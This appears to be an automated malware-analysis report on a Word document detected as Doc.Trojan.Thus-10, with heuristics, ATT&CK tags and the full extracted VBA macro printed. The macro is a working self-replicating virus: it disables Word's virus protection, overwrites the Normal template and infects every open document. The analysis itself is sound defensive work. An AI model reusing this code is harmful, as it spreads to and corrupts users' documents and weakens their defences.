MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The macro attempts to disable virus protection and manipulates the NormalTemplate to ensure its own execution. The presence of 'AntiThus' and 'Anti-Smyser' comments, along with the ClamAV detection name 'Doc.Trojan.Thus-10', strongly suggests a malicious intent to deliver a payload or perform other harmful actions.
Heuristics 3
-
ClamAV: Doc.Trojan.Thus-10 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Thus-10
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2468 bytes |
SHA-256: aece26f2da33f0730365bdcc8439bd35d1c7187198950e6315d6d941efba5a23 |
|||
|
Detection
ClamAV:
Doc.Trojan.Thus-10
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'AntiThus'
'Anti-Smyser'
' Ïðîãðàìà ïðèçíà÷åíà äëÿ çíåðàæåííÿ â³ðóñà 'Anti-Smyser'
On Error Resume Next
Application.Options.VirusProtection = False
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'AntiThus'" Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
.CodeModule.CountOfLines
End If
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
.InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
.CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
.Item(1).CodeModule.CountOfLines)
End If
Response = MsgBox("Äîêóìåíò âèë³êóâàíî!", vbOKOnly, "Ïîâ³äîìëåííÿ")
If NormalTemplate.Saved = False Then NormalTemplate.Save
CVD = 0
For k = 1 To Application.Documents.Count
If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'AntiThus'" Then
Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
.CodeModule.DeleteLines 1, Application.Documents.Item(k) _
.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
End If
If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
.CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _
.Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _
.VBComponents.Item(1).CodeModule.CountOfLines)
End If
CVD = CVD + 1
Next k
Response = MsgBox(Str(CVD) + " äîêóìåíòè âèë³êóâàíî!", vbOKOnly, "Ïîâ³äîìëåííÿ")
'Application.Options.VirusProtection = True
End Sub
Private Sub Document_Close()
Document_Open
End Sub
Private Sub Document_New()
Document_Open
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.